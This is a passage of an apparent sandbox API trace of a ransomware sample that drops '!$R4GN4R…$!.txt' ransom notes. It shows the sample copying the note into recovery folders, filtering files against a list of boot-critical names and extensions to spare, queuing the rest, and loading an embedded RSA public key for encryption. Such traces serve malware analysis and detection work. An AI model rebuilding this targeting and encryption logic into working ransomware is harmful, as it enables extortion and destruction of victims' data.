lpBuffer=0x5aff5d8, lpFilePart=0x5affc98 | out: lpBuffer="\\\\?\\D:\\*.*", lpFilePart=0x5affc98*="*.*") returned 0xa [0161.805] lstrcpyW (in: lpString1=0x5aff5e6, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0161.805] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery", lpString2="\\" | out: lpString1="\\\\?\\D:\\Recovery\\") returned="\\\\?\\D:\\Recovery\\" [0161.805] lstrcpyW (in: lpString1=0x5aff3cc, lpString2="\\\\?\\D:\\Recovery\\" | out: lpString1="\\\\?\\D:\\Recovery\\") returned="\\\\?\\D:\\Recovery\\" [0161.805] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\D:\\Recovery\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\D:\\Recovery\\!$R4GN4R_B8CF767A$!.txt" [0161.805] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\D:\\Recovery\\!$R4GN4R_B8CF767A$!.txt" (normalized: "d:\\recovery\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0161.808] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\", lpString2="*.*" | out: lpString1="\\\\?\\D:\\Recovery\\*.*") returned="\\\\?\\D:\\Recovery\\*.*" [0161.808] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\*.*", nBufferLength=0x104, lpBuffer=0x5afe4b8, lpFilePart=0x5afef8c | out: lpBuffer="\\\\?\\D:\\Recovery\\*.*", lpFilePart=0x5afef8c*="*.*") returned 0x13 [0161.808] lstrcpyW (in: lpString1=0x5afe2b0, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.808] lstrcpyW (in: lpString1=0x5afe4d8, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.808] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\Recovery\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afead4) returned 0x3548980 [0161.809] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.809] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0xedc97796, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.810] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.810] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.810] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedc97796, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedc97796, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0161.810] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0161.811] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0161.811] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 1 [0161.811] lstrcmpiW (lpString1="WindowsRE", lpString2=".") returned 1 [0161.811] lstrcmpiW (lpString1="WindowsRE", lpString2="..") returned 1 [0161.811] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\*.*", nBufferLength=0x104, lpBuffer=0x5afe8cc, lpFilePart=0x5afef8c | out: lpBuffer="\\\\?\\D:\\Recovery\\*.*", lpFilePart=0x5afef8c*="*.*") returned 0x13 [0161.811] lstrcpyW (in: lpString1=0x5afe8ec, lpString2="WindowsRE" | out: lpString1="WindowsRE") returned="WindowsRE" [0161.811] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\") returned="\\\\?\\D:\\Recovery\\WindowsRE\\" [0161.811] lstrcpyW (in: lpString1=0x5afe6c0, lpString2="\\\\?\\D:\\Recovery\\WindowsRE\\" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\") returned="\\\\?\\D:\\Recovery\\WindowsRE\\" [0161.811] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\D:\\Recovery\\WindowsRE\\!$R4GN4R_B8CF767A$!.txt" [0161.811] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\D:\\Recovery\\WindowsRE\\!$R4GN4R_B8CF767A$!.txt" (normalized: "d:\\recovery\\windowsre\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0161.814] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\", lpString2="*.*" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\*.*") returned="\\\\?\\D:\\Recovery\\WindowsRE\\*.*" [0161.814] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", nBufferLength=0x104, lpBuffer=0x5afd7ac, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x1d [0161.814] lstrcpyW (in: lpString1=0x5afd5a4, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.814] lstrcpyW (in: lpString1=0x5afd7e0, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.814] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afddc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afddc8) returned 0x35486c0 [0161.814] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.814] FindNextFileW (in: hFindFile=0x35486c0, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xedca4e5f, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.816] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.816] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.816] FindNextFileW (in: hFindFile=0x35486c0, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedca4e5f, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedca4e5f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0161.816] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0161.816] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0161.816] FindNextFileW (in: hFindFile=0x35486c0, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x21ce881b, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21ce881b, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x39762934, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0161.816] lstrcmpiW (lpString1="boot.sdi", lpString2=".") returned 1 [0161.816] lstrcmpiW (lpString1="boot.sdi", lpString2="..") returned 1 [0161.816] FindNextFileW (in: hFindFile=0x35486c0, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x80a0471e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x43d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReAgent.xml", cAlternateFileName="")) returned 1 [0161.816] lstrcmpiW (lpString1="ReAgent.xml", lpString2=".") returned 1 [0161.816] lstrcmpiW (lpString1="ReAgent.xml", lpString2="..") returned 1 [0161.816] FindNextFileW (in: hFindFile=0x35486c0, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0161.816] lstrcmpiW (lpString1="Winre.wim", lpString2=".") returned 1 [0161.816] lstrcmpiW (lpString1="Winre.wim", lpString2="..") returned 1 [0161.816] FindNextFileW (in: hFindFile=0x35486c0, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0161.816] FindClose (in: hFindFile=0x35486c0 | out: hFindFile=0x35486c0) returned 1 [0161.816] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afddc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afddc8) returned 0x3548a40 [0161.816] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0xedca4e5f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedca4e5f, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.816] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedca4e5f, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedca4e5f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0161.816] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", nBufferLength=0x104, lpBuffer=0x5afd9b4, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x1d [0161.817] lstrcpyW (in: lpString1=0x5afd9e8, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0161.817] PathFindExtensionW (pszPath="\\\\?\\D:\\Recovery\\WindowsRE\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0161.817] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0161.817] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x21ce881b, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21ce881b, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x39762934, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0161.817] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", nBufferLength=0x104, lpBuffer=0x5afd9b4, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x1d [0161.817] lstrcpyW (in: lpString1=0x5afd9e8, lpString2="boot.sdi" | out: lpString1="boot.sdi") returned="boot.sdi" [0161.817] PathFindExtensionW (pszPath="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi") returned=".sdi" [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="autorun.inf") returned 1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="boot.ini") returned 1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="bootfont.bin") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="bootsect.bak") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="bootmgr") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="bootmgr.efi") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="bootmgfw.efi") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="desktop.ini") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="iconcache.db") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="ntldr") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat.log") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.ini") returned -1 [0161.817] lstrcmpiW (lpString1="boot.sdi", lpString2="thumbs.db") returned -1 [0161.817] lstrcmpiW (lpString1=".sdi", lpString2=".db") returned 1 [0161.817] lstrcmpiW (lpString1=".sdi", lpString2=".sys") returned -1 [0161.817] lstrcmpiW (lpString1=".sdi", lpString2=".dll") returned 1 [0161.817] lstrcmpiW (lpString1=".sdi", lpString2=".lnk") returned 1 [0161.817] lstrcmpiW (lpString1=".sdi", lpString2=".msi") returned 1 [0161.818] lstrcmpiW (lpString1=".sdi", lpString2=".drv") returned 1 [0161.818] lstrcmpiW (lpString1=".sdi", lpString2=".exe") returned 1 [0161.818] GetProcessHeap () returned 0x3520000 [0161.818] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x35cefc0 [0161.819] lstrcpyW (in: lpString1=0x35cf3c0, lpString2="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi") returned="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi" [0161.820] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x80a0471e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x43d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReAgent.xml", cAlternateFileName="")) returned 1 [0161.820] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", nBufferLength=0x104, lpBuffer=0x5afd9b4, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x1d [0161.820] lstrcpyW (in: lpString1=0x5afd9e8, lpString2="ReAgent.xml" | out: lpString1="ReAgent.xml") returned="ReAgent.xml" [0161.820] PathFindExtensionW (pszPath="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml") returned=".xml" [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="autorun.inf") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="boot.ini") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootfont.bin") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootsect.bak") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootmgr") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootmgr.efi") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootmgfw.efi") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="desktop.ini") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="iconcache.db") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntldr") returned 1 [0161.820] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntuser.dat") returned 1 [0161.821] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntuser.dat.log") returned 1 [0161.821] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntuser.ini") returned 1 [0161.821] lstrcmpiW (lpString1="ReAgent.xml", lpString2="thumbs.db") returned -1 [0161.821] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0161.821] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0161.821] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0161.821] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0161.821] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0161.821] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0161.821] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0161.821] GetProcessHeap () returned 0x3520000 [0161.821] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x35dc138 [0161.822] lstrcpyW (in: lpString1=0x35dc538, lpString2="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml") returned="\\\\?\\D:\\Recovery\\WindowsRE\\ReAgent.xml" [0161.822] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0161.822] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", nBufferLength=0x104, lpBuffer=0x5afd9b4, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\Recovery\\WindowsRE\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x1d [0161.822] lstrcpyW (in: lpString1=0x5afd9e8, lpString2="Winre.wim" | out: lpString1="Winre.wim") returned="Winre.wim" [0161.823] PathFindExtensionW (pszPath="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim") returned=".wim" [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="autorun.inf") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="boot.ini") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="bootfont.bin") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="bootsect.bak") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="bootmgr") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="bootmgr.efi") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="bootmgfw.efi") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="desktop.ini") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="iconcache.db") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="ntldr") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat.log") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.ini") returned 1 [0161.823] lstrcmpiW (lpString1="Winre.wim", lpString2="thumbs.db") returned 1 [0161.823] lstrcmpiW (lpString1=".wim", lpString2=".db") returned 1 [0161.823] lstrcmpiW (lpString1=".wim", lpString2=".sys") returned 1 [0161.823] lstrcmpiW (lpString1=".wim", lpString2=".dll") returned 1 [0161.823] lstrcmpiW (lpString1=".wim", lpString2=".lnk") returned 1 [0161.823] lstrcmpiW (lpString1=".wim", lpString2=".msi") returned 1 [0161.823] lstrcmpiW (lpString1=".wim", lpString2=".drv") returned 1 [0161.823] lstrcmpiW (lpString1=".wim", lpString2=".exe") returned 1 [0161.824] GetProcessHeap () returned 0x3520000 [0161.824] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x35e92b0 [0161.825] lstrcpyW (in: lpString1=0x35e96b0, lpString2="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim") returned="\\\\?\\D:\\Recovery\\WindowsRE\\Winre.wim" [0161.825] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0161.825] GetProcessHeap () returned 0x3520000 [0161.825] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x357e348 [0161.825] CryptAcquireContextW (in: phProv=0x357e348, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x357e348*=0x35563b8) returned 1 [0163.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0163.551] GetProcessHeap () returned 0x3520000 [0163.551] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x3592b18 [0163.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x3592b18, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0163.552] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5afd588, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5afd588, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0163.554] GetProcessHeap () returned 0x3520000 [0163.554] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x3592ea8 [0163.554] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC 